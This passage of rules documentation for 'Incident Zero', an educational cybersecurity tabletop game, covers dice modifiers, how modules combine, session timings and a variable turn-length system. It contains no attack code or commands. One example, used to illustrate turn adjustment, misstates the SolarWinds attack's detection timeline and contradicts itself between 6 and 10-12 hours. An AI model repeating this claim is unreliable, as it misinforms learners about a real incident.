- Guide the narrative
During Incident Response:
- Create and manage the hidden attack chain
- Provide clues based on successful investigations
- Control Uncontained Threats penalties
- Be fair but challenging
During Other Modules:
- Describe threat context and defenses
- Draw Pentester Tactic cards (Hardening)
- Manage timeline and deadlines (Disaster Recovery)
- Guide debrief questions
Universal Tips:
- Explain why actions succeed or fail
- Ask clarifying questions about player strategy
- Balance challenge with learning
- Provide constructive feedback
Blue Team responsibilities:
- Discuss strategy as a team
- Choose one action per turn
- Justify your decisions (gain the +2 modifier)
- Manage budget carefully
- Learn from success and failure
Key Rule: Modifiers are additive and can stack.
Example (Hardening Module, canonical formula — v2.2):
Pentester Tactic: PT-02 Living-off-the-Land (DC 13)
Defense roll = d20
+ printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
+ hardening upgrades on that defense (+2 each; one upgrade: +2)
+ relevant playbook (+3)
Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS
Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.
| Length | Difficulty | Best For |
|---|---|---|
| 3 cards | Beginner | Learning mechanics, 30 min sessions |
| 4 cards | Intermediate | Standard play, 40 min sessions |
| 5 cards | Advanced | Challenge play, full kill chain |
| Budget | Difficulty | Best For |
|---|---|---|
| 60 | Hard | Resource scarcity, tough choices |
| 100 | Standard | Balanced play, most scenarios |
| 150+ | Easy | Strategic depth, multiple options |
| Turns | Difficulty | Best For |
|---|---|---|
| 8 | Hard | Time pressure, fast play |
| 10 | Standard | Balanced, most scenarios |
| 12 | Easy | Exploration, learning |
Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.
| Module | Primary Learning | Secondary Learning |
|---|---|---|
| Incident Response | Cyber kill chain, attack detection, investigation | Resource prioritization, incident response |
| Hardening | Defense-in-depth, layering, proactive security | Cost-benefit analysis, security architecture |
| Disaster Recovery | Crisis management, stakeholder communication | Risk assessment, incident cost |
| Network Building | Network design, asset security, architecture | Infrastructure hardening, threat modeling |
| Forensics | Digital forensics, chain of custody, attribution | Evidence handling, MITRE ATT&CK mapping |
| Audit & Compliance | Security assessment, governance, compliance | Risk identification, remediation prioritization |
| Mechanic | What It Teaches |
|---|---|
| d20 roll system | Uncertainty, risk, informed decision-making |
| Budget constraints | Resource allocation, prioritization |
| Justification bonuses | Technical reasoning, tools/techniques knowledge |
| Uncontained Threats penalty | Urgency, cost of dwell time |
| Pentester Tactics | Attacker sophistication, defense limitations |
| Playbook system | Preparation, incident response planning |
| Scoring systems | Outcome measurement, quality assessment |
Implementation (competitive multi-team play):
- Same setup for all teams
- Teams cannot share information (Incident Response)
- Score comparison determines the winner (Hardening)
- Reputation comparison (Disaster Recovery)
Every module should include a 5-15 minute debrief with three sections: What happened? Why did it work that way? What would you do differently? (The TO Guide describes how to run each round.)
Too Easy Signs:
- Team reveals all cards/achieves goal with 40+ budget remaining
- No failed rolls
- No meaningful decisions required
- Team is bored
Too Hard Signs:
- Team is stuck/making no progress after 5 turns
- Multiple consecutive failed rolls
- Team frustrated rather than challenged
- No learning happening
Adjustment Options:
- Easier: Provide better clues, more starting budget, fewer tactics
- Harder: Less specific clues, lower budget, more tactics
- Faster: Shorter turn limits, simpler scenarios
- Slower: More turns, more complex scenarios
For complete card descriptions, see:
- Base Threat & Defense Cards: cards/incident-response/core-deck/threat-defense-cards.md
- Expansion Threats: cards/incident-response/expansion-deck/advanced-threats.md
- Expansion Defenses: cards/incident-response/expansion-deck/advanced-defenses.md
- All decks indexed: cards/CARD_REFERENCE.md
For complete rules on each module, see docs/rules/ (core rules plus one file per module).
For your first game:
1. Choose a module from Module Combinations
2. Read the module-specific rules
3. Read the standalone setup guide
4. Prepare your scenario
5. Play!
For multiple modules:
1. Refer to Module Combinations for recommended sequences
2. Refer to FRAMEWORK.md for modifier generation procedures
3. Play the first module, generate modifiers for the next
4. Continue as desired
Incident Zero: Core Rules & Mechanics v2.1 - Balanced & Refined Edition Universal rules for all modules
docs/FRAMEWORK.md
Incident Zero is a modular, flexible educational game system. Rather than a rigid "phase" structure, we offer 6 interchangeable modules that educators can combine in any way that serves their learning objectives.
Incident Response
Duration: 30-45 minutes (solo), 20-35 minutes (in combination)
Focus: Attack detection, investigation, incident response
Best For: Teaching cyber kill chain, investigation methodology, budget prioritization
Standalone: Players detect a hidden attack chain through investigation and defense deployment
In Combination: Outcome (win/lose) and discovered cards modify subsequent modules
Hardening
Duration: 30-45 minutes (solo), 20-30 minutes (in combination)
Focus: Defense-in-depth, security architecture, proactive hardening
Best For: Teaching layered security, strategic planning, cost-benefit analysis
Standalone: Players build comprehensive defenses against known threat vectors
In Combination: Discovered threats (from Incident Response) guide defense strategy; OR defenses are generated via dice/cards
Disaster Recovery
Duration: 30-45 minutes (solo), 25-35 minutes (in combination)
Focus: Crisis management, forensics, stakeholder communication
Best For: Teaching incident response procedures, risk management, decision-making under pressure
Standalone: Players manage a breach crisis with budget constraints and reputation scoring
In Combination: Breach scope determined by Incident Response outcome; OR generated at setup
Network Building
Duration: 30-45 minutes (solo), 15-25 minutes (in combination)
Focus: Network architecture, asset security, foundational infrastructure
Best For: Teaching network design, critical asset identification, infrastructure hardening
Standalone: Players design and secure a network from scratch
In Combination: Network design becomes the prerequisite for all other modules; OR used as a rebuild scenario after Incident Response
Forensics
Duration: 30-45 minutes (solo), 25-35 minutes (in combination)
Focus: Digital forensics, evidence handling, attack attribution
Best For: Teaching chain of custody, investigation methodology, MITRE ATT&CK technique mapping
Standalone: Players investigate a compromised system, gathering evidence to build attribution, timeline, attack chain, and chain-of-custody progress
In Combination: Investigates the breach from Incident Response or Disaster Recovery; discovered evidence informs Hardening or Audit priorities
Audit & Compliance
Duration: 30-45 minutes (solo), 15-20 minutes (in combination)
Focus: Security compliance, audit procedures, governance
Best For: Teaching regulatory frameworks, security assessment, governance workflows
Standalone: Players conduct security audits and address findings
In Combination: Findings from Incident Response guide audit focus; OR used post-Hardening to validate controls
Each module can modify the next module in several ways: the win/loss outcome, the cards discovered, the breach scope, and audit findings can all carry forward (see each module's In Combination note above).
Play any single module standalone. All modifiers are generated during setup via:
- Dice rolls (d20 for random element)
- Card draws (threat, defense, or scenario cards)
- Educator narrative choices
- Difficulty selection (Beginner/Intermediate/Advanced)
Examples: Incident Response solo, Hardening solo, Disaster Recovery solo, Network Building solo, Forensics solo, Audit & Compliance solo.
Path A: Building → Defending
Network Building → Incident Response → Hardening
Path B: Crisis & Response
Incident Response (Loss) → Disaster Recovery → Audit
Path B2: Detect & Investigate
Incident Response → Forensics
Path C: Build, Test, Fix
Network Building → Audit → Hardening
Path D: Complete Lifecycle
Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
Educators can mix modules any way they choose:
- "We want Incident Response, then straight to Audit"
- "Network Building + Hardening, no incident"
- "Just Disaster Recovery for crisis training"
- "Audit first, then rebuild with Hardening"
For any custom sequence: 1. Identify the first module → play normally with generated setup 2. For each subsequent module → during setup, generate any missing modifiers that would normally flow from prior modules
When modules aren't combined sequentially, educators create modifiers at setup using:
Scenario Deck: Pre-written scenario cards describing:
- Network layouts (if starting mid-way)
- Threat context (if starting without Incident Response)
- Compliance requirements (if starting without Audit)
- Budget constraints (if starting mid-lifecycle)
Dice Methods: Randomized setup parameters:
- Roll d20 for network security level
- Roll d20 for breach scope (for Disaster Recovery solo)
- Roll d20 for compliance findings (for Audit solo)
Educator Narrative: Direct creation based on:
- Learning objectives
- Time available
- Difficulty desired
- Real-world inspiration
Example:
Educator wants: Network Building → Disaster Recovery (no Incident Response)
Setup for Disaster Recovery:
- Educator describes network built in prior module
- Generate breach scenario via dice or narrative:
"Roll 2d6: (3,5) = Insider threat, moderate data loss"
"Modifiers: Budget=60, Reputation=100, Dwell time=24 hours"
- Play Disaster Recovery with those generated modifiers
"Phases" implies:
- ❌ Linear progression (1→2→3)
- ❌ Specific sequence required
- ❌ All elements must be played
- ❌ Rigid pedagogical structure
"Modules" enables:
- ✅ Non-linear play
- ✅ Flexible educator choice
- ✅ Partial/complete experiences
- ✅ Adapts to learning objectives
- ✅ Combines in any sequence
START: What do you want to teach?
├─ "Incident response basics"
│ └─ Play: Incident Response module solo
│ (30-45 min, fast, focuses on detection)
│
├─ "Network security & architecture"
│ └─ Play: Network Building module solo
│ (30-45 min, strategic planning focus)
│
├─ "Defense-in-depth"
│ └─ Play: Hardening module solo
│ (30-45 min, layering & strategy)
│
├─ "Crisis management"
│ └─ Play: Disaster Recovery module solo
│ (30-45 min, pressure & decisions)
│
├─ "Compliance & governance"
│ └─ Play: Audit & Compliance module solo
│ (30-45 min, assessment & findings)
│
├─ "Digital forensics & attribution"
│ └─ Play: Forensics module solo
│ (30-45 min, evidence & investigation)
│
├─ "Complete incident lifecycle"
│ └─ Play: Incident Response → Disaster Recovery → Audit
│ (90-120 min, full arc, defeat scenario)
│
├─ "Defensive preparation"
│ └─ Play: Network Building → Hardening
│ (60-90 min, proactive focus)
│
├─ "Design, audit, defend"
│ └─ Play: Network Building → Audit → Hardening
│ (90-120 min, planning-focused)
│
├─ "Everything"
│ └─ Play: Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
│ (4-5 hours, comprehensive, advanced)
│
└─ "Custom"
└─ Pick any combination, generate modifiers for gaps
Every module includes:
- Setup (5 minutes): Configure difficulty, generate modifiers
- Gameplay (20-35 minutes): Core decision-making and rolls
- Scoring/Outcome (5 minutes): Determine results
- Debrief (5-15 minutes): Reflect on decisions and learning
Resource Management:
- Budget (Incident Response, Hardening, Disaster Recovery, Network Building, Forensics)
- Time/Turns (all modules)
- Reputation/Morale (Disaster Recovery, Audit)
- Progress Meters (Forensics: Attribution, Timeline, Attack Chain, Chain of Custody)
Decision Making:
- Choose action from limited options (3-5 choices)
- Roll d20 for success/failure
- Technical justification bonuses (+2, +1)
- Accept consequences or trade-offs
Modifiers & Penalties:
- Uncontained Threats (Incident Response)
- Pentester Tactics (Hardening)
- Compliance Violations (Audit)
- Network Vulnerabilities (Network Building)
- Breach Scope (Disaster Recovery)
- Anti-Forensics & Evidence Degradation (Forensics)
Debrief Questions:
- What was the decision point?
- What would you do differently?
- How does this reflect reality?
- What did you learn?
Which modules work well together?
| | IR | Hard | DR | Net | For | Audit |
|---|---|---|---|---|---|---|
| Incident Resp. | - | ✓✓ | ✓✓ | ✓ | ✓✓ | ✓ |
| Hardening | ✓✓ | - | ✓ | ✓✓ | ✓ | ✓✓ |
| Disaster Rec. | ✓✓ | ✓ | - | ✓ | ✓✓ | ✓✓ |
| Network Build. | ✓ | ✓✓ | ✓ | - | ✓ | ✓✓ |
| Forensics | ✓✓ | ✓ | ✓✓ | ✓ | - | ✓✓ |
| Audit | ✓ | ✓✓ | ✓✓ | ✓✓ | ✓✓ | - |
Legend:
✓✓ = Highly compatible (strong modifier flow)
✓ = Compatible (weak modifier flow, mostly independent)
- = Same module (obviously)
Example:
- Incident Response + Forensics = ✓✓ (revealed attack chain feeds the investigation)
- Network Building + Hardening = ✓✓ (complementary)
- Forensics + Audit = ✓✓ (findings drive assessment focus)
To support module flexibility:
docs/
├── FRAMEWORK.md # THIS FILE - Module philosophy & combinations
├── module-combinations.md # Educator guide to combining modules
├── rules/
│ ├── core-rules.md # Core mechanics (timeless)
│ ├── module-incident-response.md # Full IR rules
│ ├── module-hardening.md # Full Hardening rules
│ ├── module-disaster-recovery.md # Full DR rules
│ ├── module-network-building.md # Full Network rules
│ ├── module-forensics.md # Full Forensics rules
│ └── module-audit-compliance.md # Full Audit rules
└── standalone-games/
├── incident-response.md # IR solo setup & play
├── hardening.md # Hardening solo setup & play
├── disaster-recovery.md # DR solo setup & play
├── network-building.md # Network solo setup & play
├── forensics.md # Forensics solo setup & play
└── audit-compliance.md # Audit solo setup & play
Current: v2.2 (Playtest Edition)
Modules based on:
- Incident Response v2.1 with Uncontained Threats & Pentester Tactics
- Hardening as the post-detection defensive module (typically follows an IR win)
- Disaster Recovery as the breach-crisis module (typically follows an IR loss)
- Network Building from original design (needs v2.1 refresh)
- Forensics added in v2.1 (investigation & attribution)
- Audit & Compliance from original design (needs v2.1 refresh)
Pending Refinements:
- Network Building: Update to reflect v2.1 mechanics
- Audit & Compliance: Update to reflect v2.1 mechanics
- All modules: Explicit standalone setup procedures
- Modifier generation: Formalize dice/card procedures
Key Takeaway: You are not bound to a rigid structure. Incident Zero modules are tools in your pedagogical toolkit. Choose the modules that serve your learning objectives, sequence them in any order, and use the flexibility to adapt to your classroom needs.
Examples of Flexibility:
"I only have 45 minutes" → Play one module solo (Incident Response or Hardening)
"I want to teach the complete lifecycle" → Play all 6 modules in sequence (4-5 hours, split across sessions)
"My students need crisis management training" → Play Disaster Recovery solo
"I want to rebuild after a fictional breach" → Network Building + Hardening (no Incident Response)
"I need governance training" → Audit & Compliance solo or after Hardening
Bottom Line: Incident Zero is flexible. Your classroom needs come first. Choose the modules and combinations that work for you.
docs/module-combinations.md
This guide provides quick reference combinations for the 6 modules and recommended time allocations.
Pick ONE module and play it solo with generated modifiers.
| Module | Focus | Setup | Gameplay | Debrief |
|---|---|---|---|---|
| Network Building | Infrastructure design | 5 min | 25-35 min | 5-10 min |
| Hardening | Defense-in-depth | 5 min | 25-35 min | 5-10 min |
| Incident Response | Attack detection | 5 min | 25-35 min | 5-10 min |
| Disaster Recovery | Crisis management | 5 min | 25-35 min | 5-10 min |
| Forensics | Investigation & attribution | 5 min | 25-35 min | 5-10 min |
| Audit & Compliance | Security assessment | 5 min | 25-35 min | 5-10 min |
Setup Note: Generate all modifiers (dice rolls, scenario cards) during setup phase.
Network Building → Incident Response
- Network designed in Module 1
- Attack tests network design in Module 2
- Modifiers Flow: Network layout informs threat scenarios
- Learning: How network design affects attack surface
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Win) → Hardening
- Attack detected successfully
- Build defenses against known threats
- Modifiers Flow: Discovered attack vectors guide defense priorities
- Learning: How detection informs hardening strategy
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Loss) → Disaster Recovery
- Attack succeeds; breach occurs
- Crisis management under pressure
- Modifiers Flow: Breach scope determined by IR outcome
- Learning: Cost of detection failure; crisis response procedures
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Network Building → Audit & Compliance
- Network designed to meet requirements
- Audit identifies gaps and violations
- Modifiers Flow: Network design determines audit findings
- Learning: Compliance integration into design phase
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Win) → Forensics
- Attack detected successfully in IR phase
- Forensic investigation to understand and attribute attack
- Modifiers Flow: Discovered attack chain guides forensic analysis
- Learning: How investigation reveals attacker techniques and identity
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Disaster Recovery → Forensics
- Crisis response to major breach (from IR failure)
- Forensic investigation to understand scope and attribution
- Modifiers Flow: DR outcomes inform forensic investigation priorities
- Learning: How investigation informs future hardening decisions
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Network Building → Incident Response → Hardening
- Network design established
- Attack tests the network
- Hardening addresses findings
- Modifiers Flow: Design → Attack vectors → Defense priorities
- Learning: Complete security lifecycle (design → test → improve)
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Loss) → Disaster Recovery → Audit
- Detection fails; breach occurs
- Crisis management and recovery
- Compliance audit of breach response
- Modifiers Flow: IR outcome → DR decisions → Audit findings
- Learning: Incident lifecycle from failure through recovery
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Hardening → Audit & Compliance
- Network designed
- Defenses built proactively
- Compliance validation
- Modifiers Flow: Design → Defense strategy → Audit review
- Learning: Proactive security from design through validation
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Incident Response → Disaster Recovery
- Network architecture established
- Attack against that architecture
- Crisis management following detection failure
- Modifiers Flow: Design → Attack scenarios → Breach scope
- Learning: How design affects attack success/failure
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Loss) → Disaster Recovery → Forensics
- Detection fails; breach occurs
- Crisis management and response
- Forensic investigation for lessons learned
- Modifiers Flow: IR outcome → DR decisions → Forensic findings
- Learning: Complete failure response lifecycle with attribution
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Win) → Forensics → Hardening
- Attack detected and contained
- Forensic investigation reveals techniques and attribution
- Hardening built specifically against discovered attack
- Modifiers Flow: Detected threats → Forensic findings → Defense priorities
- Learning: Complete investigation-to-hardening workflow
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Incident Response (Win) → Hardening → Audit
- Design secure network
- Test against attack (succeed)
- Harden based on findings
- Audit final security posture
- Best For: Advanced learners, comprehensive security overview
- Total Time: 20 min setup + 140-170 min gameplay + 15 min debrief
Network Building → Incident Response (Loss) → Disaster Recovery → Hardening → Audit
- Design network
- Attack succeeds
- Crisis management
- Rebuild/harden after breach
- Compliance audit of recovery
- Best For: Advanced learners, crisis + recovery + compliance
- Total Time: 25 min setup + 160-190 min gameplay + 20 min debrief
Network Building → Incident Response (Loss) → Disaster Recovery → Forensics → Hardening
- Design network
- Attack detection fails
- Crisis response
- Forensic investigation and attribution
- Build hardening based on forensic findings
- Best For: Advanced learners, investigation-focused curriculum
- Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief
Network Building → Incident Response (Win) → Forensics → Hardening → Audit
- Design network
- Attack detected and contained
- Forensic investigation reveals techniques
- Hardening against discovered threats
- Audit of final security posture
- Best For: Advanced learners, successful response workflow
- Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief
Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit & Compliance
- Design secure network
- Build proactive defenses
- Test against attack
- Handle breach crisis (if IR fails)
- Investigate for lessons learned
- Audit overall security posture
- Best For: Research, comprehensive security curriculum, teacher training
- Total Time: 30 min setup + 210-240 min gameplay + 25 min debrief
Setup: All teams play same module(s) simultaneously
When modules aren't combined sequentially, generate missing modifiers during setup:
Generate Attack Vectors via Scenario Card:
- Draw 4 cards from scenario deck
- Each card describes a threat vector and difficulty
- Players must defend against all 4 vectors
Or Generate via Dice:
- Roll 4d6 for each vector type
- Result determines threat sophistication (3=easy, 6=hardest)
- Adjust defense difficulty accordingly
Generate Breach Scope via Dice:
- Roll 2d6: [3-5] = Low (50K records), [6-8] = Medium (500K), [9-12] = High (5M+)
- Generate breach timeline: Roll 1d4 = hours before discovery (1=6h, 2=12h, 3=24h, 4=48h)
- Set ransom demand: d20 × $50K
Or Use Scenario Card:
- Educator describes breach scenario (real or fictional)
- Players respond to described incident
Generate Attack Chain via Threat Cards:
- Shuffle threat card deck
- Draw 3, 4, or 5 cards (by difficulty)
- Arrange in logical attack progression
- Create clues for Threat Orchestrator
Or Use Pre-Built Scenario:
- Use sample scenarios from core rules
- Customize threat vectors based on learning objectives
Generate Requirements via Requirement Card:
- Draw cards specifying assets: "Email Server, Customer Database, Development Network"
- Draw security requirements: "MFA required, Data encryption mandatory, Audit logging"
- Players design network meeting all constraints
Generate Audit Scope via Dice:
- Roll 1d4: [1] = Financial compliance, [2] = Data protection, [3] = Incident response, [4] = Mixed
- Roll 1d3: [1] = 3 findings needed, [2] = 5 findings, [3] = 7 findings
- Determine which findings player must identify during audit
Example: "Teach incident response AND hardening in 90 minutes"
High Compatibility (Strong modifier flow):
- ✓✓ Incident Response + Hardening
- ✓✓ Incident Response + Forensics (if IR successful)
- ✓✓ Disaster Recovery + Forensics (if IR fails)
- ✓✓ Forensics + Hardening (forensic findings guide hardening)
- ✓✓ Forensics + Audit (forensic findings inform compliance)
- ✓✓ Network Building + Hardening
- ✓✓ Network Building + Audit
- ✓✓ Disaster Recovery + Audit
- ✓✓ Incident Response + Disaster Recovery
Medium Compatibility (Weak modifier flow, mostly independent):
- ✓ Incident Response + Audit
- ✓ Hardening + Disaster Recovery
- ✓ Network Building + Disaster Recovery
- ✓ Incident Response + Network Building
- ✓ Forensics + Network Building (investigation reveals architecture needs)
Single Module = 45 min session
- Setup: 5 min
- Play: 25-35 min
- Debrief: 5-10 min
Two Modules = 90 min session
- Setup: 10 min
- Play: 55-70 min
- Debrief: 10-15 min
Three Modules = 120 min session
- Setup: 15 min
- Play: 80-100 min
- Debrief: 10-15 min
Four/Five Modules = 2+ hours
- Setup: 20-25 min
- Play: 140-210 min
- Debrief: 15-25 min
Last updated: October 2025
For complete module details, see docs/FRAMEWORK.md
docs/VARIABLE_GAME_LENGTH_SYSTEM.md
Version: 2.1 - Production Ready
Last Updated: October 2025
Status: Core System for All Modules
Incident Zero v2.1 introduces a Variable Game Length System that adds realism and variety without requiring complex calculations. The system has two parallel tracks:
Both produce realistic game lengths that scale with attack complexity while maintaining educational depth.
Real-world basis:
- Some cyberattacks unfold in hours (ransomware deployments)
- Others take months (APT reconnaissance and persistence)
- Fixed 7-turn limits feel artificial
Educational value:
- Variable timelines teach "attacks aren't one-size-fits-all"
- Tight timelines create pressure; loose timelines reward caution
- Randomness mirrors real incident response unpredictability
Game design value:
- Prevents pattern recognition ("all games are exactly 7 turns")
- Encourages adaptation ("we have fewer turns, prioritize differently")
- Adds replayability ("same scenario, different timeline")
Turn Count = (Number of Attack Cards × 2) + 1
| Attack Chain | Calculation | Turn Count | Session Time |
|---|---|---|---|
| 3 cards | (3 × 2) + 1 | 7 turns | ~30-40 min |
| 4 cards | (4 × 2) + 1 | 9 turns | ~35-45 min |
| 5 cards | (5 × 2) + 1 | 11 turns | ~40-50 min |
| 6 cards | (6 × 2) + 1 | 13 turns | ~45-55 min |
Beginner Threat Orchestrator:
"I've selected 4 threat cards for my attack chain: Phishing → Credential Theft → Lateral Movement → Ransomware. Using the formula: (4 × 2) + 1 = 9 turns. You have 9 turns to detect and contain all four threats. Timer starts now!"
The Tier + d4 system gives experienced Threat Orchestrators control over attack sophistication while maintaining randomness for realism.
Turn Count = [Tier Base Range] + d4 Modifier
Choose ONE tier based on attack sophistication (not visibility to players):
Attacker Profile:
- Script kiddies using publicly available tools
- Low operational security
- Little reconnaissance
- Obvious techniques
Examples:
- Basic phishing + default malware
- Publicly known exploits
- No persistence mechanisms
When to Use:
- Beginner players learning the game
- Educational scenario with clear attack progression
- Teaching specific threat technique
Attacker Profile:
- Organized cybercriminal group
- Medium operational security
- Some reconnaissance
- Mix of known and custom tools
Examples:
- Targeted phishing + credential harvesting
- Lateral movement with known exploits
- Basic persistence mechanisms
- Some anti-analysis awareness
When to Use:
- Most standard scenarios
- Realistic criminal syndicate attacks
- Default for intermediate players
Attacker Profile:
- Advanced Persistent Threat (APT) group
- Strong operational security
- Extensive reconnaissance
- Custom tools and zero-days
Examples:
- Multi-vector attack with coordination
- Advanced persistence (firmware, kernel modules)
- Anti-forensics techniques
- Encrypted command-and-control
When to Use:
- Advanced player groups
- Teaching state-sponsored attack techniques
- Scenarios based on real APT campaigns
Attacker Profile:
- State-sponsored cyber operations
- Extreme operational security
- Months of reconnaissance
- Military-grade tools and exploits
Examples:
- Coordinated multi-system compromise
- Supply chain attacks
- Persistent access maintained for years
- Infrastructure with plausible deniability
When to Use:
- Research and curriculum development
- Training elite response teams
- Historical incident analysis (Stuxnet, NotPetya, etc.)
To add unpredictability, roll 1d4 and apply modifier:
| Roll | Modifier | Interpretation | Examples |
|---|---|---|---|
| 1 | -1 turn | Tight/Fast | "Attacker worked faster than expected; they had insider knowledge" |
| 2 or 3 | ±0 turns | No change | "Timeline proceeded as expected" |
| 4 | +1 turn | Loose/Slow | "Attacker was cautious with extended reconnaissance phase" |
d4 Distribution:
- 25% chance of tight timeline (-1)
- 50% chance of baseline (±0)
- 25% chance of extended timeline (+1)
Final Turn Count = Tier Base + d4 Result
Example 1: Standard Criminal Group (TIER 2)
Tier: TIER 2 (8-10 turns base)
Narrative: Organized ransomware group targeting healthcare
Roll: d4 = 2 (no modifier)
Final: 8-10 turns
Announcement: "This organized group has compromised your network.
You have 8-10 turns to detect and contain them."
Example 2: APT Attack (TIER 3)
Tier: TIER 3 (11-13 turns base)
Narrative: State-sponsored group conducting corporate espionage
Roll: d4 = 4 (+1 turn)
Final: 12-14 turns
Announcement: "A sophisticated actor has been operating in your network
for weeks. You have 12-14 turns to uncover the full extent of their access."
Example 3: Script Kiddie (TIER 1)
Tier: TIER 1 (5-7 turns base)
Narrative: Attacker using public PoC exploit
Roll: d4 = 1 (-1 turn)
Final: 4-6 turns
Announcement: "An attacker has hit your systems hard and fast.
You have only 4-6 turns before data starts being exfiltrated."
These three rules ensure the system maintains educational value and prevents metagaming:
Statement: Threat Orchestrators MUST accept the d4 result as-is, regardless of whether it feels unreasonably tight or loose for the scenario.
Rationale: Real incident response is chaotic. Sometimes:
- Well-prepared attackers execute faster than expected (they had intel)
- Cautious attackers spend weeks in reconnaissance (defensive posture matters)
- Budget runs out faster than expected (incident response is expensive)
Embracing the Chaos: When a roll feels unexpected, narrate it as realism:
Implementation:
- Roll d4 publicly (so players see it wasn't rigged)
- Accept the result immediately
- Narrate it into the scenario realistically
- Move on; don't second-guess the dice
Example Conversation:
TO: "TIER 2 attack, so 8-10 turns baseline. Rolling for variation..."
[Rolls d4: 1, which means -1]
TO: "That's tight—only 7-9 turns. But that makes sense; this group
has compromised your supplier before and knew your infrastructure.
You have 7-9 turns."
What NOT to do:
TO: "I rolled a 1, but that feels too tight. Let me roll again."
✗ NO - Accept the first roll
TO: "I rolled a 1, so I'm ignoring it and using 8-10 instead."
✗ NO - That undermines the system
TO: "That's tight but I'll add 2 turns to make it fair."
✗ NO - Only Rule 3 allows modifications (and only ±1, rarely)
Statement: Blue Team members CANNOT deduce (or ask about) the attack TIER from the announced turn count. They cannot use meta-information like "we have 9 turns, so this must be TIER 2."
Rationale:
- In reality, companies don't know attack sophistication in advance
- Attackers don't advertise their skill level
- Discovering attacker sophistication through evidence is more educational
- This prevents metagaming ("we know it's TIER 2, so let's play for 9 turns max")
What Players CAN Do:
- Ask "What suspicious activity have we detected?" → Investigates to understand threats
- Ask "Can we analyze the malware?" → Reveals sophistication through findings
- Ask "Why did this attack succeed?" → Post-game discussion (after game ends)
- Ask "How much damage was done?" → Forensic investigation (post-game)
What Players CANNOT Do:
- Ask "Is this a TIER 2 attack?" → Directly asking tier (prohibited)
- Say "This must be TIER 3 because we have 12 turns" → Meta-reasoning (prohibited)
- Assume "TIER 1 = simple, so let's focus on basics" → Meta-optimization (prevents discovery)
Implementation:
When players ask about tier/difficulty:
Player: "Is this a TIER 2 attack?"
TO: "Investigate and you'll find out. What do you want to do?"
Player: "This looks like TIER 3 based on the turn count..."
TO: "Turn count ≠ difficulty. Investigate the evidence and make your own assessment."
Player: "Can we see what we're facing?"
TO: "Some will reveal through investigation. Some will surprise you."
Statement: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment if the rolled result creates a genuinely problematic situation.
Frequency: This should be RARE (< 10% of games). Default: accept rolls.
When to Use (Genuinely Justified):
- New Player Group: Recommend extending by +1 to allow full exploration (but challenge them on game 2)
- Specific Real-World Incident
When NOT to Use (Accept Roll As-Is):
Implementation:
Step 1: Roll d4 (publicly)
Step 2: Calculate result (Tier Base + d4)
Step 3: Announce initial turn count
THEN if genuinely needed:
Step 4: Pause
Step 5: Explain why adjustment is necessary
Step 6: Apply ±1 modification (only ±1, not more)
Step 7: Announce final turn count
Step 8: Document the decision (for consistency in future scenarios)
Example Valid Use of Rule 3:
Setup: "I'm teaching the SolarWinds supply chain attack.
Real timeline was 6 hours to detection.
I have TIER 3 (11-13 turns).
Rolled d4: 2 (no modifier) = 11-13 turns.
That feels right—letting me adjust by -1 to model
the documented 10-12 hour timeline. Final: 10-12 turns."
Example Invalid Use of Rule 3:
WRONG: "I rolled 8-10 turns but my attack chain is 5 cards.
I want it longer, so I'm adding 2 turns."
CORRECT: Use TIER 3 (11-13) if you want a longer game
WRONG: "Players are doing well, so I'm extending by +2 turns."
CORRECT: No mid-game adjustments; accept the result
WRONG: "I'm just going to ignore the roll and use 10 turns."
CORRECT: Either accept d4 result or reroll from scratch (before game starts)
Hybrid Approach: Many TOs use Default Formula for most games, then switch to Tier System for special campaigns or advanced groups.
1. Design attack chain (pick 3-6 threat cards)
2. Count cards: ___
3. Calculate: (___ × 2) + 1 = ___ turns
4. Announce: "You have ___ turns."
5. Play
Time Investment: 30 seconds
1. Design attack scenario
2. Choose Tier 1-4 based on sophistication (don't announce number)
3. Write down Tier Base (e.g., "TIER 2: 8-10")
4. Roll d4 (publicly or privately)
5. Calculate: Base + d4 result = Final turn count
6. [Optional] Apply Rule 3 modification if genuinely needed (rare)
7. Announce final turn count (no tier numbers)
8. Play
9. [After game] Discuss attack sophistication discovered through gameplay
Time Investment: 2-3 minutes
═══════════════════════════════════════════════════════════════
VARIABLE GAME LENGTH SYSTEM v2.1
═══════════════════════════════════════════════════════════════
SYSTEM 1: DEFAULT FORMULA (Beginners)
────────────────────────────────────
Turn Count = (Attack Cards × 2) + 1
3 cards → 7 turns | 4 cards → 9 turns
5 cards → 11 turns | 6 cards → 13 turns
SYSTEM 2: TIER + d4 (Advanced)
──────────────────────────────
Step 1: Choose Tier (1-4, don't reveal number)
TIER 1: 5-7 turns (simple)
TIER 2: 8-10 turns (standard)
TIER 3: 11-13 turns (advanced)
TIER 4: 14-16 turns (expert)
Step 2: Roll d4 (-1, 0, 0, or +1)
Step 3: Final Turn = Tier Base + d4 Result
CRITICAL RULES
──────────────
✓ Rule 1: Accept any roll (embrace chaos)
✓ Rule 2: Don't reveal tier (let players discover via gameplay)
✓ Rule 3: Modifier authority ONLY when genuinely needed (rare)
